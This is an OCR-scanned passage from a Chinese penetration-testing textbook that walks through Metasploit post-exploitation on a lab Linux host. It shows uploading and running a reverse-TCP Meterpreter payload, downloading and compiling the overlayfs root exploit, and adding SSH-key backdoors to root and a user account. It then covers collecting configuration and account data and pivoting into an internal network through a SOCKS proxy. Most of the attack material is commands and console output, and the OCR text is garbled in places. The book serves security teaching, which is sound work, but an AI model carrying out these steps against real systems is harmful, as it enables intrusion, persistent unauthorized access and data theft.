LPORT 参数 的 值 ， 其 中 LHOsT 是 监听 器 所 在 主机 的 IP 地 址 ，LPORT 是 监听 器 所 使 用 的 端口 。 因 为 要 
在 Linux 主机 上 使 用 这 个 payload， 所 以 我 们 指定 输出 格式 ( -E ) 为 elf， 这 是 Linux 操作 系统 中 默认 
的 可 执行 二 进 制 文件 格式 。 参 数 -b 用 来 指定 那些 需要 避免 的 坏 字符 ， 如 果 在 生成 的 shellcode 中 包含 
了 坏 字符 ， 就 会 导致 在 传输 或 执行 的 过 程 中 失败 。 后 面 的 章节 中 会 有 关于 坏 字 符 产 生 原 因 以 及 如 何 处 
理 坏 字符 的 详细 讲解 。 最 后 ， 将 payload 写 人 到 reverse_connect.elf 文件 中 。 












































































































































meterpreter > upload /root/reverse connect.elf 

[*] uploading : /root/reverse connect.elf -» reverse connect.elf 
[*] uploaded : /root/reverse connect.elf -» reverse connect.elf 
meterpreter » pwd 

/var/www/html/phpcollab/logos clients 

meterpreter » 
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之 前 我 们 已 经 在 目标 计算 机 上 执行 了 一 个 PHP Meterpreter, 接 下 来 可 以 在 这 个 Meterpreter 中 使 用 
upload 命令 上 传 这 个 新 创建 的 payload。 如 上 图 所 示 ， 完 整 的 命令 需要 使 用 upload 加 上 payload 所 
在 路 径 。 另 外 , 使 用 pwa 命令 可 以 查看 文件 上 传 之 后 所 在 的 目录 ,也 就 是 我 们 正在 使 用 的 目录 。 如 果 
上 传 的 payload 被 执行 了 ， 它 就 会 回 连 到 我 们 的 系统 。 不 过 ， 我 们 需要 准备 好 一 个 能 够 接收 这 次 回 连 
的 handler。 这 个 handler 在 启动 之 后 将 会 处 理 即将 到 来 的 连接 ， 如 下 图 所 示 。 





























meterpreter > background 

[*] Backgrounding session 1... 

msf exploit(43519) » pushm 

msf exploit(43519) » use exploit/multi/handler 
msf exploit(handler) » set payload linux/x64/meterpreter/reverse tcp 
payload -» linux/x64/meterpreter/reverse tcp 
msf exploit(handler) » set LHOST 192.168.174.128 
LHOST -» 192.168.174.128 

msf exploit(handler) » set LPORT 4443 

LPORT -» 4443 

msf exploit(handler) » exploit -j 

[*] Exploit running as background job 0. 





[*] Started reverse TCP handler on 192.168.174.128:4443 
msf exploit(handler) > 目 











从 上 图 中 可 以 看 到 ,使 用 background 命令 可 以 将 当前 的 PHP Meterpreter 会 话 切 换 到 后 台 。 然 
后 启动 exploit/multi/handler 模块 ， 并 将 其 中 的 payload, LHOST fll LPORT 值 设 定 为 与 之 前 的 reverse_ 
connectelf 一 样 ， 然 后 使 用 exploit 命令 来 执行 。 











在 执行 exploit 时 使 用 参数 -j 就 可 以 在 后 台 启 动 handler。 这 样 做 的 好 处 是 可 以 一 次 
运行 多 个 handler， 而 且 它 们 都 保持 在 后 台 运 行 。 
现在 已 经 成 功 启动 了 这 个 handler， 接 下 来 需要 在 目标 系统 上 运行 payload， 如 下 图 所 示 。 
meterpreter > shell 


Process 8202 created. 
Channel 5 created. 























pwd 
/var/www/html/phpcollab/logos clients 
chmod +x reverse connect.elf 
./reverse connect.elf & 


[*] Sending stage (2878936 bytes) to 192.168.174.132 
[*] Meterpreter session 2 opened (192.168.174.128:4443 -» 192.168.174.132:38929) at 2018-01-26 15:47:44 40530 




















在 Meterpreter 中 使 用 shell 切换 到 系统 shell 命令 行 工 作 模式 。 我 们 之 前 已 经 使 用 pwa 查看 了 目 
标 系统 的 当前 工作 目录 。 接 下 来 要 为 payload 文件 赋予 一 个 可 执行 权限 ， 这 样 它 才 可 以 执行 。 最 后 使 





用 & 标 识 符 在 后 台 运 行 reverse_connect.elf。 上 图 给 出 了 全 部 过 程 ， 当 这 个 文件 执行 之 后 ， 在 目标 主机 
上 就 会 打开 一 个 新 的 Meterpreter 会 话 。 使 用 sessions -i 命令 可 以 看 到 我 们 已 经 在 日 标 系统 上 打开 
了 两 个 Meterpreter 会 话 。 
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^C 

Terminate channel 5? [y/N] y 
meterpreter » background 

[*] Backgrounding session 1... 

msf exploit(handler) » sessions -i 


Active sessions 


Id Type Information 


1  meterpreter php/linux www-data (33) @ ubuntu 
192.168.174.128:4444 -» 192.168.174.132:44617 (192.168.174.132) 

2  meterpreter x64/linux uid-33, gid-33, euid-33, egid-33 @ 192.168.174.132 
192.168.174.128:4443 -» 192.168.174.132:38929 (192.168.174.132) 











不 过 ， 比 起 PHP Meterpreter, x64/Linux 的 Meterpreter 显然 是 一 个 更 好 的 选择 。 除 非 获得 了 权限 
更 高 的 Meterpreter， 否 则 我 们 将 一 直 使 用 它 来 控制 目标 系统 。 如 果 出 现 了 意外 的 话 ， 我 们 可 以 切换 到 
HP Meterpreter， 然 后 再 次 运行 这 个 payload， 就 像 之 前 所 做 的 一 样 。 这 里 需要 注意 的 一 点 是 ， 无 论 现 
在 使 用 的 是 哪个 类 型 的 Meterpreter ， 我 们 都 是 低 权 限 的 用 户 ， 而 这 种 情况 是 需要 改变 的 。Metasploit 
框架 中 提供 了 一 个 名 为 1ocal exploit suggester 的 优秀 模块 ， 利 用 它 可 以 提升 权限 。 这 个 模块 
内 置 了 一 个 可 以 用 来 检测 各 种 本 地 特权 提升 漏洞 的 功能 ， 并 会 给 出 最 合适 的 选择 。 我 们 可 以 按照 下 图 
所 示 来 加 载 这 个 模块 。 































































































msf exploit(handler) > use post/multi/recon/local exploit suggester 
msf post(local exploit suggester) > show options 


Module options (post/multi/recon/local exploit suggester): 


Name Current Setting Required Description 
SESSION yes The session to run this module on 
SHOWDESCRIPTION false yes Displays a detailed description f 


or the available exploits 


msf post(local exploit suggester) > set SESSION 2 
SESSION => 2 
msf post(local exploit suggester) > run 





[*] 192.168.174.132 - Collecting local exploits for x64/linux... 














我 们 使 用 use 命令 加 上 绝对 路 径 post/multi/recon/local exploit suggester 来 启动 这 个 模块 。 既 然 希 
望 在 目标 系统 上 使 用 这 个 渗透 模块 ， 我 们 自然 需要 选择 一 个 较 好 的 Meterpreter。 因 此 ， 我 们 通过 输入 
命令 SESSION 2 来 切换 到 会 话 2， 这 个 2 也 就 是 x64/Linux Meterpreter 所 对 应 的 会 话 标 识 符 。 下 面 来 
运行 这 个 模块 并 分 析 输 出 。 
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msf exploit(handler) > use post/multi/recon/local exploit suggester 
msf 


post(local exploit suggester) » show options 


Module options (post/multi/recon/local exploit suggester): 


Name Current Setting Required Description 
SESSION yes The session to run this module on 
SHOWDESCRIPTION false yes Displays a detailed description f 


or the available exploits 


msf post(local exploit suggester) » set SESSION 2 
SESSION -» 2 

msf post(local exploit suggester) » run 

[*] 
[*] 192.168.174.132 - 5 exploit checks are being tried... 


192.168.174.132 - exploit/linux/local/overlayfs priv esc: The target appears 


o be vulnerable. 
[*] Post module execution completed 
f post(local exploit suggester) » | | 


192.168.174.132 - Collecting local exploits for x64/linux... 























4 


























很 神奇 吧 ! 我 们 可 以 看 到 这 个 模块 利用 位 于 exploit/linux 中 的 ovezlayfs priv esc 工具 成 功 获 
得 了 目标 系统 上 的 root 控制 权限 。 但 是 我 还 有 一 个 练习 要 留 给 大 家 。 首 先 在 目标 上 下 载 一 个 用 户 权 限 





提升 工具 ， 然 后 执行 它 来 获得 root 控制 权限 。 可 以 到 https://www.exploit-db.com/exploits/37292 下 载 这 





个 渗透 模块 。 下 一 节 将 会 介绍 这 个 模块 的 细节 。 


使 用 本 地 root 渗透 模块 提升 权限 

















overlayfs 权限 提升 漏洞 允许 本 地 用 户 获 得 root 权限 ,这 是 因为 当 用 户 对 底层 目录 的 文件 进行 修 














改 时 ,会 将 原文 件 复制 一 份 到 上 层 目 录 ， 在 这 个 过 程 中 没有 对 文件 的 权限 进行 检查 ， 导 致 


用 overlayfs 绕 过 文件 系统 权限 检查 。 


«p 关于 这 个 漏洞 的 详细 描述 可 以 查看 https://www.cvedetails.com/cve/cve-2015-1328。 




















j 户 可 以 利 


接 下 来 我 们 进入 shell 命令 行 ， 然 后 控制 目标 系统 从 https:/wwwexploitdb.com/ 中 下 载 渗透 攻击 模块 。 





meterpreter > shell 

Process 12741 created. 

Channel 88 created. 

id 

uid-33(www-data) gid-33(www-data) groups-33(www-data) 

wget https://www.exploit-db.com/raw/37292 

--2018-01-26 03:02:57-- https://www.exploit-db.com/raw/37292 


ected. 

HTTP request sent, awaiting response... 200 OK 
Length: 5119 (5.0K) [text/plain] 

Saving to: '37292' 


OK .... 





2018-01-26 03:02:58 (1021 MB/s) - '37292' saved [5119/5119] 


Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8 
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... 


100% 1021M-0s 


conn 
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已 





我 们 将 这 个 渗透 攻击 模块 的 名 字 由 37292 修改 为 37292.c， 然 后 使 用 acc 来 编译 这 个 





会 得 到 一 个 可 执行 的 文件 ， 如 下 图 所 示 。 


mv 37292 37292.c 

ls 

37292.c 

index.php 

reverse connect.elf 
gcc 37292.c -o getroot 
ls 

37292.c 

getroot 

index.php 

reverse connect.elf 


可 以 看 到 我 们 已 经 成 功 完成 了 对 这 个 文件 的 编译 ， 接 下 来 可 以 执行 它 了 。 


./getroot 

spawning threads 

mount #1 

mount £2 

child threads done 
etc/ld.so.preload created 
creating shared library 












































sh: 0: can't access tty; job control turned off 
H 
干 得 不 错 ! 随 着 这 个 渗透 模块 的 运行 ,我 们 已 经 获得 了 目标 系统 的 root 控制 权限 。 这 意味 着 我 们 
经 彻底 控制 了 被 渗透 的 计算 机 。 运 行 一 些 基本 命令 来 验证 当前 我 们 的 身份 ， 这 个 过 程 如 下 所 示 。 
whoami 
root 


Linux ubuntu 3.13.0-24-generic £46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86 6 


4 x86 64 x86 64 GNU/Linux 
id 
mer gid=0(root) groups-0(root),33(www-data) 








还 记得 吗 ? 之 前 还 有 一 个 在 后 台 运 行 的 handler。 我 们 再 次 运行 习 


了 个 reverse connect.elf 文件 。 





# pwd 
/var/www/html/phpcollab/logos clients 
# ls 

37292.c 

getroot 

index.php 

reverse connect.elf 

# ./reverse connect.elf 


[*] Sending stage (2878936 bytes) to 192.168.174.132 


at 2018-01-26 16:38:25 40530 





[*] Meterpreter session 3 opened (192.168.174.128:4443 -» 192.168.174.132:38935) 








现在 又 打开 了 一 个 Meterpreter 会 话 ! 我 们 来 看 看 这 个 新 打开 的 Meterpreter IBI TR 








1 两 个 Meterpreter 





的 区 别 。 
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msf > sessions -i 


Active sessions 


Id Type Information 


1 meterpreter php/linux www-data (33) @ ubuntu 


192.168. 


2 meterpreter x64/linux 


192.168. 


3 meterpreter x64/linux 


174.128:4444 -» 192.168.174.132:44617 (192.168.174.132) 

uid-33, gid-33, euid-33, egid-33 @ 192.168.174.132 
174.128:4443 -» 192.168.174.132:38929 (192.168.174.132) 

uid-0, gid-0, euid-0, egid-0 @ 192.168.174.132 
174.128:4443 -» 192.168.174.132:38935 (192.168.174.132) 











192.168. 
msf » 
这 里 已 经 取得 了 


























目标 系统 上 的 第 三 个 Meterpreter 会 话 。 不 过 这 个 会 话 中 的 UID, 也 就 是 用 户 的 ID 











为 0， 表示 这 是 一 个 root 级 的 用 户 。 因 此 这 个 Meterpreter 会 话 就 拥有 了 
不 受 限 制 地 控制 整个 系统 。 现 在 可 以 使 用 session -i 命令 加 上 会 话 的 标识 符 (本 例 中 为 3 ) 在 这 些 








会 话 中 进行 切换 。 





root 级 的 权限 ,我 们 可 以 以 此 








msf > sessions -i 


Active sessions 


Id Type Information 


1 meterpreter php/linux www-data (33) @ ubuntu 


192.168. 


2 meterpreter x64/linux 


192.168. 


3 meterpreter x64/linux 


192.168. 


msf » 


174.128:4444 -» 192.168.174.132:44617 (192.168.174.132) 

uid-33, gid-33, euid-33, egid-33 @ 192.168.174.132 
174.128:4443 -» 192.168.174.132:38929 (192.168.174.132) 

uid-0, gid-0, euid-0, egid-0 @ 192.168.174.132 
174.128:4443 -» 192.168.174.132:38935 (192.168.174.132) 














如 上 图 所 示 , 使 用 gecuia 命令 来 确认 一 下 当前 已 经 获得 的 root 用 


已 经 都 在 我 们 的 控 











关中 了 ， 那 么 接 下 来 又 该 做 些 什 么 呢 ? 


1.6.5 ”使 用 Metasploit 保持 控制 权限 





保持 对 目标 的 持续 控制 是 相当 有 用 的 功能 , 尤其 是 当 涉及 执法 机 构 或 者 红 队 在 测试 目标 系统 上 部 




















署 的 防御 时 ， 这 个 功能 显得 尤为 重要 


sshkey persist 

















。 我 们 可 以 使 用 Metasploit 工具 中 post/linux/manage 目录 下 的 
nce 模块 来 实现 对 Linux 服务 器 的 持续 控制 ,这 个 模块 会 将 我 们 已 有 的 或 者 新 创建 





户 权 限 。 好 了 ， 现 在 整个 系统 











的 SSH 密 钥 添加 到 目标 系统 的 所 有 用 户 中 。 这样 当 下 次 我 们 需要 登录 到 该 目标 系统 时 , 它 永 远 不 会 要 

















求 输入 密码 ， 而 是 允许 使 用 密 钥 登 录 。 下 面 来 看 看 这 个 实现 过 程 。 
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msf > use post/linux/manage/sshkey persistence 
msf post(sshkey persistence) » show options 


Module options (post/linux/manage/sshkey persistence): 











Name Current Setting Required Description 

CREATESSHFOLDER false yes If no .ssh folder is found, 
create it for a user 

PUBKEY no Public Key File to use. (Def 
ault: Create a new one) 

SESSION yes The session to run this modu 
le on. 

SSHD CONFIG /etc/ssh/sshd config yes sshd config file 

USERNAME no User to add SSH key to (Defa| 


ult: all users on box) 


msf post(sshkey persistence) » set SESSION 3 
SESSION => 3 
msf post(sshkey persistence) » run 


接 下 来 可 以 使 用 sec SESSION 命令 加 上 标识 符 切换 到 指定 会 话 。 因 为 我 们 需要 的 是 最 高 级 的 系 
统 权限 ， 所 以 使 用 3 作为 标识 符 切 换 到 这 个 会 话 。 在 这 个 会 话 中 运行 该 模块 ， 整 个 过 程 如 下 图 所 示 。 


msf post(sshkey_persistence) > run 
























































[*] Checking SSH Permissions 

[*] Authorized Keys File: .ssh/authorized keys 

[*] Finding .ssh directories 
Storing new private key as /root/.msf4/loot/20180126170207 AcmeTest 192.168. 

174.132 id rsa 150126.txt 

[*] Adding key to /home/claire/.ssh/authorized keys 
Key Added 

[*] Adding key to /root/.ssh/authorized keys 
Key Added 

[*] Post module execution completed 

sf post(sshkey persistence) > lj 


这 个 模块 创建 了 一 个 新 的 SSH 密 钥 ,然后 将 其 添加 到 了 目标 系统 的 两 个 账户 root 和 claire 中 。 现 
在 可 以 通过 用 户 root 和 claire 使 用 SSH 连接 到 目标 系统 ， 如 果 成 功 的 话 ， 表 明 这 个 后 门 程序 已 经 成 功 
完成 了 任务 。 这 个 过 程 如 下 图 所 示 。 


root@kali:~# ssh root@192.168.174.132 -i /root/.msf4/100t/20180126170207 AcmeTes 
t 192.168.174.132 id rsa 150126.txt 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86 64) 



































* Documentation: https://help.ubuntu.com/ 
New release '16.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Thu Jan 25 10:31:44 2018 
rootQubuntu:-£ li 


够 神奇 吧 ! 可 以 看 到 我 们 已 经 使 用 参数 -i 和 新 创建 的 SSH 密 钥 登录 到 目标 系统 上 了 ， 如 上 图 所 
示 。 接 下 来 看 看 是 否 可 以 使 用 用 户 claire 远程 登录 : 


rootGkali:-£ ssh claire@192.168.174.132 -i /root/.msf4/loot/20180126170207_AcmeT 
est 192.168.174.132 id rsa 150126.txt 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86 64) 





























* Documentation: Mhttps://help.ubuntu.com/ 
New release '16.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Fri Jan 26 03:28:15 2018 from 192.168.174.128 
claireQubuntu:-$ J 





棒 极 了 ! 现在 我 们 可 以 随意 使 用 这 两 个 账号 登录 了 。 





无 论 被 你 ; 
试 模块 ， 利 用 它们 就 可 以 获取 目标 系统 上 的 各 种 数据 。 下 面 来 使 
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不 过 大 多 数 的 服务 器 都 不 允许 root 登录 。 因 此 你 需要 修改 目标 系统 中 的 sshdconfig 
， 将 其 中 “root login” 的 值 修改 为 “yes”， 然 后 重新 启动 SSH 服务 。 
尽量 只 在 一 个 用 户 (例如 root ) 里 添加 后 门 ， 因 为 大 多 数 的 用 户 都 不 会 使 用 root 进 
行 远程 登录 的 ， 这 是 因为 在 默认 配置 中 这 一 点 是 被 禁止 的 。 
后 渗透 测试 模块 与 跳板 功能 











渗透 的 计算 机 安装 了 什么 类 型 的 操作 系统 ，Metasploit 中 都 提供 
有 这样 的 

















个 模块 。 





msf post(sshkey persistence) > use post/linux/gather/enum configs 
msf post(enum configs) > show options 


Module options (post/linux/gather/enum configs): 
Name 


SESSION 


Current Setting Required Description 


The session to run this module on. 


msf post(enum configs) > set SESSION 3 
SESSION -» 3 
msf post(enum configs) > run 


Running module against 192.168.174.132 
Info: 

Ubuntu 14.04 LTS 

Linux ubuntu 3.13.0-24-generic £46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86 64 x86 64 x86 64 GNU/Linux 
apache2.conf stored in /root/.msf4/loot/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 759279.txt 
ports.conf stored in /root/.msf4/loot/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 787500.txt 
] Failed to open file: /etc/nginx/nginx.conf: core channel open: Operation failed: 1 
] Failed to open file: /etc/snort/snort.conf: core channel open: Operation failed: 1 
my.cnf stored in /root/.msf4/100t/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 248693.txt 
ufw.conf stored in /root/.msf4/100t/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 458081.txt 
sysctl.conf stored in /root/.msf4/l100t/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 773436.txt 
Failed to open file: /etc/security.access.conf: core channel open: Operation failed: 1 
shells stored in /root/.msf4/loot/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 454816.txt 
sepermit.conf stored in /root/.msf4/loot/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 970263.txt 
ca-certificates.conf stored in /root/.msf4/loot/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 365379.txt 
access.conf stored in /root/.msf4/loot/20180126171037 AcmeTest 192.168.174.132 linux.enum.conf 339575.txt 


[-1 


了 大 量 可 用 的 后 渗透 测 


[-] Failed to open file: /etc/gated.conf: 


core channel open: 





Operation failed: 1 





运行 enum configs 后 渗透 测试 模块 ， 


这 些 内 容 有 助 于 我 们 完成 密码 发 现 、 了 解密 码 模式 、 
强大 的 模块 是 enum_system, 它 可 以 收集 关于 操作 系统 的 信息 、 用 户 账 号 、 











作业 、 硬 盘 信息 和 日 志文 件 等 ， 如 下 图 所 示 。 





可 以 看 到 已 经 收集 了 存在 于 目标 系统 上 的 所 有 配置 文件 。 
查看 各 种 运行 服务 的 信息 等 操作 。 AP | i 


运行 的 服务 、 运 行 的 cron 

















msf > use post/linux/gather/enum system 


msf post(enum system) > show options 
Module options (post/linux/gather/enum system): 


Name 


Current Setting Required Description 


SESSION The session to run this module on. 
msf post(enum system) > setg SESSION 3 

SESSION => 3 

msf post(enum system) > run 


Info: 
Ubuntu 14.04 LTS 
Linux ubuntu 3.13.0-24-generic £46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86 64 x86 64 x86 64 GNU/Linux 
Module running as "root" user 
Linux version stored in /root/.msf4/100t/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 219190.txt 
User accounts stored in /root/.msf4/loot/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 673609.txt 
Installed Packages stored in /root/.msf4/1o0t/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 457163.txt 
Running Services stored in /root/.msf4/loot/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 135921.txt 
Cron jobs stored in /root/.msf4/loot/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 714694.txt 
Disk info stored in /root/.msf4/100t/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 199591.txt 
Logfiles stored in /root/.msf4/loot/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 425033.txt 
Setuid/setgid files stored in /root/.msf4/100t/20180126171255 AcmeTest 192.168.174.132 linux.enum.syste 402122.txt 
Post module execution completed 
post(enum system) > B 


[*] 
[*] 
[*] 
[*] 
[*] 
[*] 
[*] 
[*] 
[*1 
Imsf 
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我 们 已 经 在 目标 上 收集 了 大 量 的 信息 ， 现 在 是 时 候 开始 编写 报告 了 吗 ? 不 ， 时 机 还 未 到 。 的 确 ， 
一 个 合格 的 渗透 测试 者 可 以 人 侵 目 标 系统 ， 获 得 最 高 的 控制 权限 ， 并 对 其 进行 分 析 。 不 过 优秀 的 渗透 
测试 者 并 不 会 仅仅 停留 在 这 些 工作 上 , 他 的 目标 不 只 是 一 个 主机 , 而 是 会 竭尽 所 外 Mu pu 
并 获取 更 多 的 控制 权限 ( 如 果 允 许 的 话 )。 下 面 介绍 一 些 可 以 进入 到 内 部 网 络 的 跳板 命令 。 其 中 一 
很 常用 的 命令 是 arp， 它 可 以 列 出 内 部 网 络 中 与 被 渗透 主机 通信 过 的 所 有 主机 。 















































meterpreter > arp 


ARP cache 


IP address MAC address Interface 
192.168.116.133  00:0c:29:c2:22:13 
192.168.174.2 00:50:56:fa:6b:58 
192.168.174.128 00:0c:29:26:22:de 




















可 以 看 到 这 里 面 有 一 个 单独 的 网 络 192.168.116.0 存在 ,我 们 输入 命令 ifconfig 来 查看 目标 系统 
中 是 否 安装 有 连接 到 其 他 网 络 的 网 卡 : 


meterpreter > ifconfig 


Interface 1 














ame : lo 
ardware MAC : 00:00:00:00:00:00 
: 65536 

FLags : UP,LOOPBACK 
IPv4 Address : 127.0.0.1 
IPv4 Netmask : 255.0.0.0 
IPv6 Address : ::1 
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:: 


Interface 2 


ame : eth0 
ardware MAC : 00:0c:29:81:ae:b9 
: 1500 

Flags : UP, BROADCAST, MULTICAST 
IPv4 Address : 192.168.174.132 
IPv4 Netmask : 255.255.255.0 
IPv6 Address : fe80::20c:29ff:fe81:aeb9 
IPv6 Netmask : ffff:ffff:ffff:ffff:: 


Interface 3 


ame : ethl 
ardware MAC : 00:0c:29:81:ae:c3 
TU : 1500 


Flags : UP, BROADCAST, MULTICAST 
IPv4 Address : 192.168.116.129 

IPv4 Netmask : 255.255.255.0 

IPv6 Address : fe80::20c:29ff:fe81:aec3 
IPv6 Netmask : ffff:ffff:ffff:ffff:: 

















果然 没 错 ! 我 们 在 目标 系统 上 又 发 现 了 一 个 网 络 适配器 〈Interface 3 )， 它 连接 到 了 一 个 单独 的 网 
络 。 不 过 Les ping 或 者 扫描 这 个 网 络 里 的 地 址 时 , 却 都 失败 了 ,看 来 从 我 们 的 主机 是 无 法 直接 
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连接 到 这 个 网 络 的 。 所 以 我 们 需要 一 种 通过 被 渗透 主机 将 数据 转发 到 目标 系统 的 机 制 ， 这 种 机 制 通常 
被 称 作 跳板 (pivoting )。 首 先 需 要 通过 Meterpreter 在 被 渗透 主机 上 添加 一 条 到 达 目 标 网 络 的 路 由 ， 这 
样 任何 从 我 们 主机 所 发 出 的 信息 都 会 经 由 被 渗透 主机 转发 到 目标 网 络 ， 而 接收 到 的 主机 会 以 为 这 些 信 
息 来 自 被 渗透 主机 。 现 在 就 来 通过 Meterpreter 添加 这 个 路 由 ， 过 程 如 下 所 示 。 


msf > use post/multi/manage/autoroute 
msf post(autoroute) > show options 




































































Module options (post/multi/manage/autoroute): 


Name Current Setting Required Description 

CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) 
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" 

SESSION yes The session to run this module on. 

SUBNET no Subnet (IPv4, for example, 10.10.10.0) 


msf post(autoroute) > set SESSION 3 

SESSION => 3 

msf post(autoroute) > set SUBNET 192.168.116.0 
SUBNET => 192.168.116.0 

msf post(autoroute) > run 


*] Running module against 192.168.174.132 
*] Searching for subnets to autoroute. 
Route added to subnet 192.168.116.0/255.255.255.0 from host's routing table. 


Route added to subnet 192.168.174.0/255.255.255.0 from host's routing table. 
[*] Post module execution completed 


在 上 图 中 我 们 使 用 了 post/multi/manage 目录 下 的 autoroute 后 渗透 测试 模块 ， 并 使 用 参数 
SUBNET 指定 了 目标 子 网 ， 使 用 参数 SESSION 指明 了 用 来 传输 数据 的 Meterpreter 会 话 的 标识 符 。 可 
以 看 到 通过 这 个 模块 的 运行 ,我们 已 经 成 功 添加 了 一 条 到 达 目 标 网 络 的 路 由 。 现 在 再 次 在 Metasploit 
中 运行 TCP 端口 扫描 模块 ， 查 看 是 否 可 以 对 目标 网 络 进行 扫描。 
























































> use auxiliary/scanner/portscan/tcp 


msf 
msf auxiliary(tcp) » show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name Current Setting Required Description 

CONCURRENCY 10 yes The number of concurrent ports to check per host 

DELAY 9 yes The delay between connections, per thread, in milliseconds 

JITTER 9 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. 
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) 

RHOSTS 192.168.116.133 yes The target address range or CIDR identifier 

THREADS 10 yes The number of concurrent threads 

TIMEOUT 1000 yes The socket connect timeout in milliseconds 


imsf auxiliary(tcp) > run 

















现在 运行 portscanner 模块 来 扫描 之 前 用 arp 命令 查看 到 的 主机 ， 也 就 是 192.168.116.133, J 
用 10 个 线程 来 查看 1 ~ 10000 号 端口 ， 这 个 过 程 如 下 图 所 示 。 


msf auxiliary(tcp) > run 











192.168.116.133: - 192.168.116.133:80 - TCP OPEN 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 
msf auxiliary(tcp) > J 

















成 功 了 ! 我 们 发 现 目 标 主机 上 的 80 端口 是 开放 的 。 不 过 ， 这 个 成 功 必须 以 通过 Meterpreter 为 前 
提 。 如 果 可 以 运行 一 些 通过 浏览 圳 来 查看 目标 80 端口 信息 的 外 部 工具 就 好 了 ， 这 样 就 可 以 了 解 关于 
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目标 80 kb Dd PDA dE Metasploit 中 内 置 了 一 个 socks 代理 模块 , 运行 外 部 工具 所 产 
生 的 流量 可 以 通过 这 个 模块 到 达 192.168.116.133 主机 。 使 用 这 个 模块 的 过 程 如 下 所 示 。 























msf > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > show options 


Module options (auxiliary/server/socks4a): 


Name Current Setting Required Description 
SRVHOST 0.0.0.0 yes The address to listen on 
SRVPORT 1080 yes The port to listen on. 


Auxiliary action: 


Name X Description 





msf auxiliary(socks4a) > Į 


auxiliary/server 路 径 下 的 socks4a 模块 就 可 以 完成 这 个 任务 。 它 可 以 在 本 地 的 1080 端口 建立 一 
个 网 关 , 然后 将 流量 路 由 到 目标 系统 。 在 127.0.0.1 上 的 代理 会 将 产生 的 浏览 器 流量 通过 被 渗透 的 主机 
进行 转发 。 不过, 如 果 需 要 使 用 外 部 工具 的 话 , 我 们 还 得 使 用 proxychains, 并 将 其 端口 设置 为 1080。 
这 个 proxychains 的 端口 设置 是 通过 修改 /etc/proxychains.conf 文 件 实现 的 。 











出 





















































root@kali: ~ 600 
File Edit View Search Terminal Help 
GNU nano 2.8.7 File: /etc/proxychains.conf 


Hocks5 192.168.67.78 1080 lamer secret 


# http 192.168.89.3 8080 justu hidden 

# socks4 192.168.1.49 1080 

# http 192.168.39.93 8080 

# 

# 

# proxy types: http, socks4, socks5 

# ( auth types supported: "basic"-http  "user/pass"-socks ) 
# 

[ProxyList] 


# add proxy here ... 

# meanwile 

# defaults set to "tor" 
socks4 国 127.9.9.1 1080 


Wd Get Help M Write Out M7 Where Is M3 Cut Text BE] Justify W Cur Pos 
a. Exit Wü! Read File gi Replace W) Uncut Text To Spell gli Go To Line 





接 下 来 需要 做 的 就 很 简单 了 ， 只 需要 在 浏览 器 中 将 代理 设置 为 这 个 地 址 , 或 者 在 使 用 第 三 方 的 命 
行程 序 (例如 Nmap 和 Metasploit ) 时 ,将 proxychains 作为 命令 执行 的 前 级 。 首 先 如 下 图 所 示 进 
— 
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Preferences - Mozilla Firefox (Build 20170809204109) eoo00 

Kali Linux, an Offensive S.. x / X Preferences x \+ 
€ | © Firefox | about:preferences#advanced e | @ |Q Search *6 9 fA v $ = 
Ex Most Visitedv 网 offensive Security *« Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools ʻ®. Exploit-DB W Aircrack-ng BWKali Forums » 





Connection Settings 


Configure Proxies to Access the Internet 
No proxy 


Auto-detect proxy settings for this network 


Use system proxy settings 
@ Manual proxy configuration: 
HTTP Proxy: 
Use this proxy server for all protocols 

SSL Proxy: 
ETP Proxy: 

SOCKS Host: 127.0.0.1 

€ SOCKS v4 SOCKS v5 





No Proxy for: 
localhost, 127.0.0.1 


Help 


























另外 还 需要 确保 将 No Proxy for 处 的 “localhost” 和 “127.0.0.1” 删 掉 。 代 理 设置 完成 之 后 ， 需 要 
在 浏览 器 中 输入 目标 卫 地 址 和 SO 端口 ,来 查看 是 否 可 以 达到 目标 的 80 端口 。 








Ex Most Visitedv Bil Offensive Security Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools 地 Exploit-DB W Aircrack-ng BYKali Forums » 
Disk Pulse Enterprise v9.9.16 27-Jan-2018 17:13:11 £ 


Disk Pulse Enterprise Status | 
is) in run’ 
Command Directories Status Changes Actions Tools | 


他 Monitor System Disk CY Active 2000 0 | 


Login 


msf auxiliary(socks4a) > run 

*] Auxiliary module running as background job 5. 
sf auxiliary(socks4a) » 

*] Starting the socks4a proxy server 





Lm 








